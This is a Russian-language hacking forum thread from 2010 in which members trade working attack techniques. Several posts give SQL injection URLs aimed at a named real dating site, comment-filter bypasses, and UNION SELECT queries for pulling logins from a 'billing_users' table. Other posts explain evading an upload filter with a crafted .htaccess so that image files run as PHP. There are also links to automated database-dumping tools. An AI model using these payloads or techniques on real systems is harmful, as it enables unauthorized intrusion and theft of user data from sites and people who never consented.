05.05.2010, 19:09
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами:
8556372
Репутация:
127
|
|
Сообщение от durito
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
|
|
|
06.05.2010, 10:19
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от durito
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
При твоем запросе вылетает ошибка "Microsoft VBScript runtime error '800a000d' ". Это означает, что используется Microsoft Jet Database Engine и запросы передается на очень низком уровне, на которые вряд ли получится повлиять.
Для EoGeneo:
https://forum.antichat.ru/showpost.php?p=236188&postcount=3 - автоматический частичный\полный дампинг БД (mssql, mysql-5.*)
и тут еще
https://forum.antichat.ru/thread148915.html как одни из многих функций есть и дампинг
Последний раз редактировалось mr.celt; 06.05.2010 в 10:29..
|
|
|
|
06.05.2010, 10:43
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Подскажите плиз, делаю всё как тут http://bug-track.ru/showpost.php?p=49&postcount=1
т.е. имеется аплоадер файлов, + phpinfo()
upload php запрещён. но я могу заливать любые другие файлы
и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif
но сервер не выполняет как php, а отдаёт файл на закачку. ещё в phpinfo сказано что php подключен как CGI, может поэтому не раб? тода подсажите плиз как в CGI PHP подрубить другие расширрнеия с помощью .htaccess
Последний раз редактировалось scorpic393; 06.05.2010 в 10:48..
|
|
|
|
06.05.2010, 12:12
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от scorpic393
upload php запрещён. но я могу заливать любые другие файлы
и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif
Попробуй так:
Код:
RemoveType .html .gif
AddType application/x-httpd-php .html .gif
Последний раз редактировалось mr.celt; 06.05.2010 в 14:58..
|
|
|
|
06.05.2010, 13:06
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от durito
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Сообщение от b82a
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
Сообщение от durito
b82a комментарий если убрать, то доступен, вылетает ошибка
Сообщение от pinch
значит фильтруется --
попробуй:
#
%-%-
%2D%2D
Вставлю свои 5 копеек...
http://www.freeukdatingsite.com/imagePop.asp?Item=@@version
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+union+select+null,@@v ersion,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null
Напридумывали каких-то фильтров)
зы. Может я слишком плоско мыслью, но я не понимаю, зачем писать попробуй то..сё, если человек отписал с урл...
Последний раз редактировалось v1d0qz; 06.05.2010 в 16:55..
|
|
|
|
05.05.2010, 19:25
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
b82a комментарий если убрать, то доступен, вылетает ошибка
|
|
|
|
05.05.2010, 19:56
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
значит фильтруется --
|
|
|
|
05.05.2010, 20:03
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
попробуй:
#
%-%-
%2D%2D
|
|
|
|
05.05.2010, 21:08
|
|
Познающий
Регистрация: 15.11.2009
Сообщений: 59
С нами:
8677596
Репутация:
32
|
|
del
Последний раз редактировалось Mysterious; 06.05.2010 в 13:24..
|
|
|
|
05.05.2010, 23:14
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
подскажите плиз по скуле. в общем подобрал все нужное и колво столбцов и имя таблицы. делаю запрос на несуществующее поле - вылетает ошибка (как положено) Ввожу запрос правильный (через скулю) он не выводит информацию из БД а тупо отображает то что было если бы я не вставлял скулю. ' UNION SELECT 1, login FROM billing_users LIMIT 0,1 -- выдает страницу без изменений ' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- A Database Error Occurred Error Number: 1054 Unknown column 'login1' in 'field list' SELECT login, email FROM billing_users WHERE login = '' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- ' OR email = '' То есть запрос вроде верный в 1ом случае а он ничего не выводит, ни на страницу, не в исходнике =( Это я так понимаю Blind SQL Injection и тут методом перебора только ? или как?
нет не блинд....
причины:
1)таблица находится в другой базе
2)таблица пустая
3)проблемы с кодировками
решение:
1)придется смириться
2)для mysql4
' UNION SELECT 1, count(*) FROM billing_users--
для mysql5
' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'--
если вывело 0 значит таблица пустая
3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 --
' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
